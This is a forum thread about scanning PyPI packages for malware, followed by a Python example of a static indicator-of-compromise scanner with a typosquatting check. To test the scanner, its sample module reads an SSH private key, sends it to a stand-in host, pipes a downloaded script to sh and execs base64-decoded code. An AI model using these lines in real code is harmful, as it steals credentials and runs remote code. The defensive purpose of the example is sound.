by ashishbijlani
553 days ago
We scan PyPI packages regularly for malware to provide a private registry of vetted packages. The tech is open-sourced: Packj [1]. It uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of a shell, use of SSH keys, network communication, use of decode+eval, etc.). It also checks several metadata attributes to detect impersonating packages (typosquatting).

[1] https://github.com/ossillate-inc/packj
Also, you only know if your security measures work if you test them. I'd feel much safer if there were regular pen-testing by security researchers. We're talking about potential threats from nation state actors here.
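A minimal version of the static half of the scan the Packj comment above describes, written as an added example for this thread (it is not Packj's code, which lives at the linked repo): it resolves import aliases, flags shell spawning, network calls, SSH-key path strings and the nested decode+eval pattern over a constructed sample module, and runs a one-typo edit-distance check of the package name against an assumed list of popular names. The rule sets, the popular-package list and the sample package are all assumptions made for the demo.

```python
"""Static IoC scan of Python source plus a typosquat check on the package
name. Added illustration for this thread, not Packj's own code; the rule
sets, popular-package list and sample module are assumptions for the demo."""
import ast

# Hypothetical rule sets (assumed for this example). Fully qualified call
# names are matched after import aliases have been resolved.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.Popen", "subprocess.run",
               "subprocess.call", "subprocess.check_output"}
NETWORK_CALLS = {"socket.socket", "urllib.request.urlopen",
                 "requests.get", "requests.post"}
DECODE_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress",
                "bytes.fromhex"}
SSH_PATH_FRAGMENTS = (".ssh/", "id_rsa", "id_ed25519", "authorized_keys")
# Assumed list of high-download names a squatter would target.
POPULAR = ["requests", "numpy", "urllib3", "setuptools", "django", "flask"]


def dotted_name(node):
    """'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class IoCVisitor(ast.NodeVisitor):
    """Walks the AST, resolving aliases so `sp.run` becomes `subprocess.run`."""

    def __init__(self):
        self.aliases = {}
        self.findings = []  # (indicator, line)

    def visit_Import(self, node):
        for a in node.names:
            self.aliases[a.asname or a.name] = a.name

    def visit_ImportFrom(self, node):
        for a in node.names:
            self.aliases[a.asname or a.name] = f"{node.module or ''}.{a.name}"

    def resolve(self, name):
        head, _, rest = name.partition(".")
        head = self.aliases.get(head, head)
        return f"{head}.{rest}" if rest else head

    def visit_Call(self, node):
        name = self.resolve(dotted_name(node.func) or "")
        if name in SHELL_CALLS:
            self.findings.append(("shell_spawn", node.lineno))
        elif name in NETWORK_CALLS:
            self.findings.append(("network", node.lineno))
        elif name in ("eval", "exec"):
            # decode+eval: the argument is itself a decode/decompress call
            arg = node.args[0] if node.args else None
            if isinstance(arg, ast.Call) and \
                    self.resolve(dotted_name(arg.func) or "") in DECODE_CALLS:
                self.findings.append(("decode_eval", node.lineno))
            else:
                self.findings.append(("eval", node.lineno))
        self.generic_visit(node)

    def visit_Constant(self, node):
        # String literals that point at SSH key material
        if isinstance(node.value, str) and \
                any(f in node.value for f in SSH_PATH_FRAGMENTS):
            self.findings.append(("ssh_key_access", node.lineno))


def scan_source(src):
    """Return sorted, de-duplicated (indicator, line) pairs for one module."""
    visitor = IoCVisitor()
    visitor.visit(ast.parse(src))
    return sorted(set(visitor.findings))


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name, popular=POPULAR, max_distance=1):
    """Popular names within one typo of `name` (exact matches excluded)."""
    name = name.lower()
    return [p for p in popular
            if p != name and osa_distance(name, p) <= max_distance]


# Constructed sample module that does everything the comment lists.
SAMPLE = """
import os
import base64
import subprocess as sp
from urllib.request import urlopen

def setup():
    key = open(os.path.expanduser("~/.ssh/id_rsa")).read()
    urlopen("http://example.invalid/collect", data=key.encode())
    sp.run("curl http://example.invalid/x | sh", shell=True)
    exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
"""

if __name__ == "__main__":
    print(scan_source(SAMPLE))
    print(typosquat_candidates("reqeusts"))
```

The static pass only recognises the nested `exec(b64decode(...))` form; the split form (`payload = b64decode(...)` on one line, `exec(payload)` later) needs a dataflow step or the dynamic/behavioral pass the comment pairs static analysis with, and a dropper that fetches its second stage over the network will only show as `network` here.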